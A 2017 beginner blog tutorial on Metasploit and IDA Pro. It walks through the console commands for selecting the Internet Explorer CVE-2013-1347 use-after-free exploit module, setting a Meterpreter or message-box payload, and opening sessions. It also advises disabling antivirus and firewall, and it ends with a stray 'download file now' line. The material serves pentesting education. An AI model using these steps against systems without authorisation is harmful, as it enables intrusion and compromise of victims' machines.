Sunday, September 17, 2017
Exploiting and Debugging for Beginners
Exploiting and Debugging for Beginners
In this post I will give a brief explanation of the two most important tools used for developing exploits and analysing vulnerabilities. The first is the Metasploit pentesting software which is used to develop exploits and the second is the IDA Pro software developed for debugging, but in the context of security used for reverse engineering and vulnerability analysis.
Metasploit
The Metasploit tool makes it easier to develop exploits. It has a large database of exploits and payloads which is regularly updated. The term exploit refers to a piece of code that targets a vulnerability or multiple vulnerabilities on a particular system. We will define it as any software that uses the system in a way that it isnt supposed to in order to perform actions without permission.If you dont have Metasploit installed you can download it here for free. Keep in mind that you have to disable your antivirus and firewall when youre using Metasploit because they will block some of its components.
Once you start the metasploit console you can type help to see a list of all the commands you can use. In order to find an exploit that is connected to a certain vulnerability the command search can be used. For example, if you want to find an exploit that uses the CVE-2013-1347 vulnerability in Internet Explorer 8 you can type search cve-2013-1347.
As it can be seen in the picture above the exploit that is needed is labeled ie_cgenericelement_uaf. In order to start using it type use exploit/windows/browser/ie_cgenericelement_uaf into the console.
After deciding on the exploit you have to choose a payload that will be sent to the target. The payload is a piece of code sent to the victims machine along with exploit that will be executed if the exploit is successful. The show payloads command will show you all the available payloads in Metasploit that are compatible with the exploit you selected. The choice of payload depends on the goal you want to accomplish with this attack and the operating system youre attacking. Aside from the payloads in Metasploits database, you also have an option to write your own custom made payloads.
When it comes to gaining access the shell on the victims computer the most popular choice is the Meterpreter payload. If youre interested in other types of payloads you can find information about them here. To set a payload type set payload [path_to_the_payload]. For example, if you want to initiate the Message Box with this attack type set payload windows/messagebox.
Before initiating the exploit you should always check if all the parameters are set correctly by using the show options command. To adjust a certain parameter type set [parameter_name] [parameter_value]. Once youve checked all the parameters, initiate the exploit with the exploit or run command. Metasploit will then either start attacking the targeted machine or it will create an URL that you use for the exploit.
A successful exploit will result in a new session being opened. To check all the ongoing sessions type sessions and to start a session type sessions -i [session_id].
IDA Pro
IDA Pro is one of the most popular debugging tools, but because of its features and quality it is heavily used for reverse engineering by security specialists.Once you start IDA Pro you have the option to start a new disassembly or to load a disassembly youve previously worked on.
If you choose the New option you have to load the file you will disassemble. You also have to choose a specific debugger like the Bochs plugin or the Windbg debugger. Your choice will vary depending on the file youre debugging and how you need to analyse it.
After you choose a specific program and the debugger, IDA will proceed and try to analyse the program and make its graph view. Depending on the selected debugger and the program you wish to analyse you will sometimes have to attach the analysis to an already running process in order to help IDA adjust all the parameters.
The following picture is an example of a dissasembly in IDA.
On the right side of the picture, under the tab titled IDA View-A, you can see the program organised into connected code fragments that create a graph. You can also see the overview of the complete graph of the program in the lower left side of the picture. By right-clicking on the graph in the tab IDA View-A, and selecting Text view you can toggle to a classic linear view of the programs code.
You can also notice on the top of the picture that there is a tab named Hex View-A, which provides hexadecimal representation of the program. It is useful when you are developing an exploit and you need to analyse how the exploit modifies the programs memory during execution. Since a lot of exploits are based on memory corruption this information is crucial.
IDA Pro offers a lot of additional useful options like tracing and breakpoints. Tracing gives you a printout of the values in registers during the analysis. It also gives you insight into the programs execution which makes the analysis easier. To start the trace select Debugger -> Tracing -> Instruction tracing in the Menu Bar and to see the trace printout select Debugger -> Tracing -> Trace window. Breakpoints are used to pause the programs execution at a certain point. To put a breakpoint on a certain instruction just right-click that line and select Add Breakpoint.
.
You can also use the F2 key as a shortcut for inserting breakpoints.
Pentesting
Since both of these programs offer a wide array of options they are regularly used for pentesting. To be used effectively you need to be skilled in their application, and the only way to become skilled is with a lot of practice. Furthermore, finding and recognising vulnerabilities also requires a lot of practice and general knowledge about programing and computer systems. A good way to learn pentesting is to study exploits that are already tested and analysed and then work your way up. Once you have enough experience you will be able to find vulnerabilities yourself and write your own exploits for them.download file now
